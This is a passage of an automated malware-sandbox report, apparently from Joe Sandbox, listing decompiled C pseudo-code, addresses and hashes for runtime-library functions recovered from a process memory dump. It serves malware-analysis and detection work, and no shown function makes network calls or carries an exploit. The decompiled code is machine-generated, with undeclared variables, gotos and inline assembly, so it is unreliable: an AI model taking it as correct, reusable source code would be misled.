                                                                        • Instruction ID: 95eb7644eedf044a10d4792ab2113219c7079fb06c07f9125a28880fda4e9259
                                                                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                        • Instruction Fuzzy Hash: AA31C236B00504AFDB158AA9C945BBFFBABEF84210F05806DE805B7751DA74DD01C690
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0566FDE2 Relevance: .1, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E0566FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0566FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E05670A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E055C7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E05661608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E05672B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0566C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0566DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E055C7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0566A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                        0x0566fde7
                                                                        0x0566fde8
                                                                        0x0566fdec
                                                                        0x0566fdee
                                                                        0x0566fdf5
                                                                        0x0566fdf7
                                                                        0x0566fdfc
                                                                        0x0566fe19
                                                                        0x0566fe22
                                                                        0x0566fe26
                                                                        0x0566fec6
                                                                        0x0566fecd
                                                                        0x0566fed5
                                                                        0x0566fee7
                                                                        0x0566fed7
                                                                        0x0566fee0
                                                                        0x0566fee0
                                                                        0x0566feef
                                                                        0x0566ff00
                                                                        0x0566ff02
                                                                        0x0566ff07
                                                                        0x0566ff07
                                                                        0x00000000
                                                                        0x0566feef
                                                                        0x0566fe33
                                                                        0x0566fe55
                                                                        0x0566fe59
                                                                        0x0566fe5b
                                                                        0x0566fe5e
                                                                        0x0566fe69
                                                                        0x0566fe6d
                                                                        0x0566fe6d
                                                                        0x0566fe69
                                                                        0x0566fe35
                                                                        0x0566fe41
                                                                        0x0566fe41
                                                                        0x0566fe79
                                                                        0x0566fe8b
                                                                        0x0566fe7b
                                                                        0x0566fe84
                                                                        0x0566fe84
                                                                        0x0566fe93
                                                                        0x00000000
                                                                        0x0566fea8
                                                                        0x0566feba
                                                                        0x00000000
                                                                        0x0566feba
                                                                        0x0566fdfe
                                                                        0x0566fe01
                                                                        0x0566fe02
                                                                        0x0566fe08
                                                                        0x0566ff0c
                                                                        0x0566ff14
                                                                        0x0566ff14

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                        • Instruction ID: b42b6974aadba0e14659438f463b2126af0188d7a63062134d749b0ffb1ce11b
                                                                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                        • Instruction Fuzzy Hash: 09310632304681BFD322DB68D858F6AFBEAFBC5650F18445CE4468BB4ADA74EC41C764
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0566EA55 Relevance: .1, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E0566EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E055C2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0566E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E055AF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E055BFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0566AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0566BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E055C7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0565FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E055BFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0566A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                        0x0566ea55
                                                                        0x0566ea66
                                                                        0x0566ea68
                                                                        0x0566ea6c
                                                                        0x0566ea6f
                                                                        0x0566ea72
                                                                        0x0566ea75
                                                                        0x0566ea7a
                                                                        0x0566ea7a
                                                                        0x0566ea7e
                                                                        0x0566ea80
                                                                        0x0566ea85
                                                                        0x0566ea8b
                                                                        0x0566eab5
                                                                        0x0566eabc
                                                                        0x0566eabf
                                                                        0x0566eabf
                                                                        0x0566eaca
                                                                        0x0566eace
                                                                        0x0566ead0
                                                                        0x0566eae4
                                                                        0x0566eaeb
                                                                        0x0566eaf0
                                                                        0x0566eaf5
                                                                        0x0566eb09
                                                                        0x0566eb0d
                                                                        0x0566eb1d
                                                                        0x0566eb2d
                                                                        0x0566eb38
                                                                        0x0566eb3d
                                                                        0x0566eb41
                                                                        0x0566eb4a
                                                                        0x0566eb60
                                                                        0x0566eb4c
                                                                        0x0566eb52
                                                                        0x0566eb59
                                                                        0x0566eb59
                                                                        0x0566eb68
                                                                        0x0566eb71
                                                                        0x0566eb71
                                                                        0x0566ea8d
                                                                        0x0566ea8f
                                                                        0x0566ea92
                                                                        0x0566ea97
                                                                        0x0566ea97
                                                                        0x0566ea9b
                                                                        0x0566ea9c
                                                                        0x0566ea9e
                                                                        0x0566eaa6
                                                                        0x0566eaa6
                                                                        0x0566eb7e

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                        • Instruction ID: 07cc9fc7005d695971bca137b60f579ef5cfd4006ca2fa8205ff0683f979acd9
                                                                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                        • Instruction Fuzzy Hash: CA31BE7A704706AFC719DF28C884A6BB7AAFFC0210F04492DE55287741EE31E809CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 056269A6 Relevance: .1, Instructions: 108COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E056269A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x569d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L055B6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E05626BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E055E9980() >= 0) {
							E055C2280(_t56, 0x5698778);
							_t77 = 1;
							_t68 = 1;
							if( *0x5698774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x5698774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E055AB6F0(0x558c338, 0x558c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E055E9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E055E95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E055BFFB0(_t68, _t77, 0x5698778);
				}
				_pop(_t78);
				return E055EB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                        0x056269b5
                                                                        0x056269be
                                                                        0x056269c3
                                                                        0x056269c9
                                                                        0x056269cc
                                                                        0x056269d1
                                                                        0x056269d3
                                                                        0x056269de
                                                                        0x056269e1
                                                                        0x056269ea
                                                                        0x056269f6
                                                                        0x056269fe
                                                                        0x05626a13
                                                                        0x05626a14
                                                                        0x05626a15
                                                                        0x05626a16
                                                                        0x05626a1e
                                                                        0x05626a26
                                                                        0x05626a31
                                                                        0x05626a36
                                                                        0x05626a37
                                                                        0x05626a40
                                                                        0x05626a49
                                                                        0x05626a4a
                                                                        0x05626a53
                                                                        0x05626a59
                                                                        0x05626a5d
                                                                        0x05626a5e
                                                                        0x05626a64
                                                                        0x05626a67
                                                                        0x05626a6a
                                                                        0x05626a6d
                                                                        0x05626a70
                                                                        0x05626a77
                                                                        0x05626a7d
                                                                        0x05626a86
                                                                        0x05626a89
                                                                        0x05626a9c
                                                                        0x05626a9f
                                                                        0x05626aa2
                                                                        0x05626aa5
                                                                        0x05626aaf
                                                                        0x05626ab1
                                                                        0x05626ab8
                                                                        0x05626ab9
                                                                        0x05626abb
                                                                        0x05626abe
                                                                        0x05626ac5
                                                                        0x05626ac5
                                                                        0x05626aaf
                                                                        0x05626a40
                                                                        0x05626a26
                                                                        0x056269fe
                                                                        0x05626ace
                                                                        0x05626ad0
                                                                        0x05626ad3
                                                                        0x05626ad8
                                                                        0x05626adf
                                                                        0x05626adf
                                                                        0x05626ae8
                                                                        0x05626aef
                                                                        0x05626aef
                                                                        0x05626af9
                                                                        0x05626b06

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5e3baab618c4e0a955a32039cc1b34e000fafa7de7d89910b2523f4a2d86875
                                                                        • Instruction ID: 49f46869275f45903f0028e14b6f958214186e1a22831762eaa27c5601bc44ba
                                                                        • Opcode Fuzzy Hash: f5e3baab618c4e0a955a32039cc1b34e000fafa7de7d89910b2523f4a2d86875
                                                                        • Instruction Fuzzy Hash: 744168B1E00619AFDB14DFA4D945BFEBBF8FF88714F14812AE816A7240DB709905CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055A5210 Relevance: .1, Instructions: 107COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E055A5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E055A52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E055E95D0();
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E055BEB70(_t54, 0x56979a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E055E95D0();
								L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E055BEB70(_t54, 0x56979a0);
						}
						return _t52;
					}
					L5:
					_t33 = E055EF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E055BEB70(_t54, 0x56979a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E055E95D0();
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                        0x055a5220
                                                                        0x055a5224
                                                                        0x05600d13
                                                                        0x05600d16
                                                                        0x05600d19
                                                                        0x055a522a
                                                                        0x055a522a
                                                                        0x055a522d
                                                                        0x055a522d
                                                                        0x055a5231
                                                                        0x055a5235
                                                                        0x055a5239
                                                                        0x05600d5c
                                                                        0x05600d62
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05600d6a
                                                                        0x05600d7b
                                                                        0x05600d7f
                                                                        0x05600d81
                                                                        0x05600d84
                                                                        0x05600d95
                                                                        0x05600d95
                                                                        0x05600d6c
                                                                        0x05600d71
                                                                        0x05600d71
                                                                        0x05600d9a
                                                                        0x00000000
                                                                        0x055a524a
                                                                        0x055a524a
                                                                        0x055a5250
                                                                        0x05600d24
                                                                        0x05600d35
                                                                        0x05600d39
                                                                        0x05600d3b
                                                                        0x05600d3e
                                                                        0x05600d50
                                                                        0x05600d50
                                                                        0x05600d26
                                                                        0x05600d2b
                                                                        0x05600d2b
                                                                        0x00000000
                                                                        0x05600d55
                                                                        0x055a5256
                                                                        0x055a525b
                                                                        0x055a5265
                                                                        0x05600da7
                                                                        0x055a526b
                                                                        0x055a526e
                                                                        0x055a5272
                                                                        0x05600db1
                                                                        0x05600db4
                                                                        0x05600dc5
                                                                        0x05600dc5
                                                                        0x055a5272
                                                                        0x055a5278
                                                                        0x055a527e
                                                                        0x055a528a
                                                                        0x055a528c
                                                                        0x055a528d
                                                                        0x00000000
                                                                        0x055a5280
                                                                        0x055a5282
                                                                        0x055a5288
                                                                        0x055a529f
                                                                        0x055a5292
                                                                        0x00000000
                                                                        0x055a5292
                                                                        0x00000000
                                                                        0x055a5288
                                                                        0x055a527e

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f6528cbc54c9a80111736ea424fbd1404b0f95a2989f8f283c8dfffa9276c748
                                                                        • Instruction ID: 2f130af7e6f5fa0798361662f34aafd6cac2de304db28a5597974a4ab85f17c2
                                                                        • Opcode Fuzzy Hash: f6528cbc54c9a80111736ea424fbd1404b0f95a2989f8f283c8dfffa9276c748
                                                                        • Instruction Fuzzy Hash: AB31F836655601EBCB299B54C849F6B77B6FF50770F514A19E4160B6D0FB70E802C7E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E3D43 Relevance: .1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055E3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E055B7B60(0, _t61, 0x55811c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E055B7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L055C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                        0x055e3d4c
                                                                        0x055e3d50
                                                                        0x055e3d55
                                                                        0x055e3d5e
                                                                        0x0561e79a
                                                                        0x00000000
                                                                        0x0561e79a
                                                                        0x055e3d68
                                                                        0x0561e789
                                                                        0x055e3d9d
                                                                        0x055e3da3
                                                                        0x055e3daf
                                                                        0x055e3db5
                                                                        0x055e3dbc
                                                                        0x055e3dc4
                                                                        0x055e3dc9
                                                                        0x055e3dce
                                                                        0x0561e7ae
                                                                        0x0561e7ae
                                                                        0x055e3dde
                                                                        0x055e3de2
                                                                        0x055e3de7
                                                                        0x055e3e0d
                                                                        0x055e3e13
                                                                        0x055e3e16
                                                                        0x055e3e1e
                                                                        0x055e3e25
                                                                        0x055e3e28
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055e3e2a
                                                                        0x055e3e2f
                                                                        0x055e3e37
                                                                        0x055e3e37
                                                                        0x00000000
                                                                        0x055e3e37
                                                                        0x055e3e31
                                                                        0x00000000
                                                                        0x055e3e31
                                                                        0x055e3e20
                                                                        0x055e3e20
                                                                        0x055e3e35
                                                                        0x00000000
                                                                        0x055e3de9
                                                                        0x055e3de9
                                                                        0x055e3de9
                                                                        0x055e3dee
                                                                        0x055e3dfd
                                                                        0x055e3dff
                                                                        0x055e3e02
                                                                        0x055e3e05
                                                                        0x055e3e05
                                                                        0x00000000
                                                                        0x055e3df0
                                                                        0x055e3de7
                                                                        0x0561e78f
                                                                        0x0561e794
                                                                        0x055e3d79
                                                                        0x055e3d84
                                                                        0x055e3d89
                                                                        0x055e3d8e
                                                                        0x00000000
                                                                        0x0561e7a4
                                                                        0x055e3d96
                                                                        0x055e3d9a
                                                                        0x00000000
                                                                        0x055e3d9a
                                                                        0x00000000
                                                                        0x0561e794
                                                                        0x055e3d6e
                                                                        0x055e3d73
                                                                        0x00000000
                                                                        0x0561e7b5
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d71fb44a60d4ba0e685f0e5a1609a5305b89c5126f78815c93692aa1e2975f0b
                                                                        • Instruction ID: c8f8ff790fc7d2d65c8b0fec519ff8476f17068516f0d4467bb75d8403aa8682
                                                                        • Opcode Fuzzy Hash: d71fb44a60d4ba0e685f0e5a1609a5305b89c5126f78815c93692aa1e2975f0b
                                                                        • Instruction Fuzzy Hash: C131A331A05625DBD729CF29C541A7BBBF6FF85750B0A886EE846CB350E770E840C794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DA61C Relevance: .1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E055DA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x5680220);
				E055FD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x5697b9c; // 0x0
				_t55 = L055C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E055FD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x5697b10 =  *0x5697b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x569536c; // 0x77e05368
					if( *_t51 != 0x5695368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x5695368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x569536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E055DA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                        0x055da61c
                                                                        0x055da61e
                                                                        0x055da623
                                                                        0x055da628
                                                                        0x055da62b
                                                                        0x055da62d
                                                                        0x055da648
                                                                        0x055da64a
                                                                        0x055da64f
                                                                        0x05619b44
                                                                        0x055da6ec
                                                                        0x055da6f1
                                                                        0x055da6f1
                                                                        0x055da655
                                                                        0x055da657
                                                                        0x055da65a
                                                                        0x055da65d
                                                                        0x055da662
                                                                        0x055da663
                                                                        0x055da667
                                                                        0x055da668
                                                                        0x055da66d
                                                                        0x055da706
                                                                        0x055da706
                                                                        0x05619bda
                                                                        0x05619be6
                                                                        0x05619beb
                                                                        0x00000000
                                                                        0x05619beb
                                                                        0x055da679
                                                                        0x05619b7a
                                                                        0x00000000
                                                                        0x05619b7a
                                                                        0x055da683
                                                                        0x055da6f4
                                                                        0x055da6f7
                                                                        0x055da6f9
                                                                        0x055da6fd
                                                                        0x055da6a0
                                                                        0x055da6a0
                                                                        0x055da6ad
                                                                        0x055da6af
                                                                        0x055da6b4
                                                                        0x05619ba7
                                                                        0x05619bac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05619bc6
                                                                        0x05619bce
                                                                        0x05619bd1
                                                                        0x05619bd3
                                                                        0x05619bd3
                                                                        0x00000000
                                                                        0x05619bd1
                                                                        0x055da6bd
                                                                        0x055da6c3
                                                                        0x055da6c6
                                                                        0x055da6d2
                                                                        0x055da701
